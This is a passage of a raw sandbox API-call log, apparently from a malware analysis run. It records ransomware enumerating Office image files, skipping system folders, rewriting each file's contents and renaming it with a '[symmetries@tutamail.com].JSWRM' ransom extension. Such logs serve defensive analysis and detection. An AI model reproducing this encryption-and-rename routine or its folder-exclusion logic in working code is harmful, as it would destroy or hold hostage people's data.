| out: lpFileSize=0x345e890*=2362) returned 1 [0133.096] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.096] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x930, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x930, lpOverlapped=0x0) returned 1 [0133.097] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.097] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x930, lpOverlapped=0x0) returned 1 [0133.097] CloseHandle (hObject=0x238) returned 1 [0133.098] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.098] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a665235, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xab2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.contrast-white_scale-140.png", cAlternateFileName="MSA29A~1.PNG")) returned 1 [0133.098] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.099] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.099] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.099] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.099] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0133.099] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0133.099] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.099] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.099] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0133.099] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-140.png", lpString2="msocache") returned -1 [0133.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22d0d8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0133.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0133.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.100] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2738) returned 1 [0133.100] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.100] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xab0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xab0, lpOverlapped=0x0) returned 1 [0133.103] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.103] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xab0, lpOverlapped=0x0) returned 1 [0133.103] CloseHandle (hObject=0x238) returned 1 [0133.104] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.105] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a68b471, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a68b471, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd17, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.contrast-white_scale-180.png", cAlternateFileName="MSFF1F~1.PNG")) returned 1 [0133.105] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.105] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.105] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.105] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.105] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0133.105] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0133.105] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.105] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.105] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0133.105] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-180.png", lpString2="msocache") returned -1 [0133.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0133.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0133.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.106] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3351) returned 1 [0133.106] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.106] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd10, lpOverlapped=0x0) returned 1 [0133.108] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.108] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd10, lpOverlapped=0x0) returned 1 [0133.108] CloseHandle (hObject=0x238) returned 1 [0133.108] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.109] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a68b471, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a68b471, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x733, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.contrast-white_scale-80.png", cAlternateFileName="MSE33B~1.PNG")) returned 1 [0133.109] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.109] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.109] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.109] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.109] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0133.109] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0133.109] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.109] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.109] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0133.109] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-80.png", lpString2="msocache") returned -1 [0133.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-80.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0133.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-80.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0133.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.110] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1843) returned 1 [0133.111] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.111] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x730, lpOverlapped=0x0) returned 1 [0133.112] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.112] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x730, lpOverlapped=0x0) returned 1 [0133.112] CloseHandle (hObject=0x238) returned 1 [0133.112] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.113] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a68b471, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a68b471, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9c8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.scale-100.png", cAlternateFileName="MSBF6D~1.PNG")) returned 1 [0133.117] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-100.png", lpString2=".") returned 1 [0133.117] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-100.png", lpString2="..") returned 1 [0133.117] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-100.png", lpString2="...") returned 1 [0133.117] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-100.png", lpString2="windows") returned -1 [0133.117] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-100.png", lpString2="recovery") returned -1 [0133.117] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-100.png", lpString2="perflogs") returned -1 [0133.117] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-100.png", lpString2="documents and settings") returned 1 [0133.117] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.117] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-100.png", lpString2="system volume information") returned -1 [0133.117] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-100.png", lpString2="msocache") returned -1 [0133.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x240ef8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 31 [0133.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 31 [0133.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.118] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2504) returned 1 [0133.118] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.118] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9c0, lpOverlapped=0x0) returned 1 [0133.120] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.120] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9c0, lpOverlapped=0x0) returned 1 [0133.120] CloseHandle (hObject=0x238) returned 1 [0133.120] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.121] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a68b471, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a68b471, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb43, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.scale-140.png", cAlternateFileName="MS1EB3~1.PNG")) returned 1 [0133.121] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-140.png", lpString2=".") returned 1 [0133.121] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-140.png", lpString2="..") returned 1 [0133.121] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-140.png", lpString2="...") returned 1 [0133.121] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-140.png", lpString2="windows") returned -1 [0133.122] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-140.png", lpString2="recovery") returned -1 [0133.122] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-140.png", lpString2="perflogs") returned -1 [0133.122] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-140.png", lpString2="documents and settings") returned 1 [0133.122] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.122] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-140.png", lpString2="system volume information") returned -1 [0133.122] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-140.png", lpString2="msocache") returned -1 [0133.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x241380, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 31 [0133.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x241268, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 31 [0133.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.122] WideCharToMultiByte (in: CodePage=0xfde9, 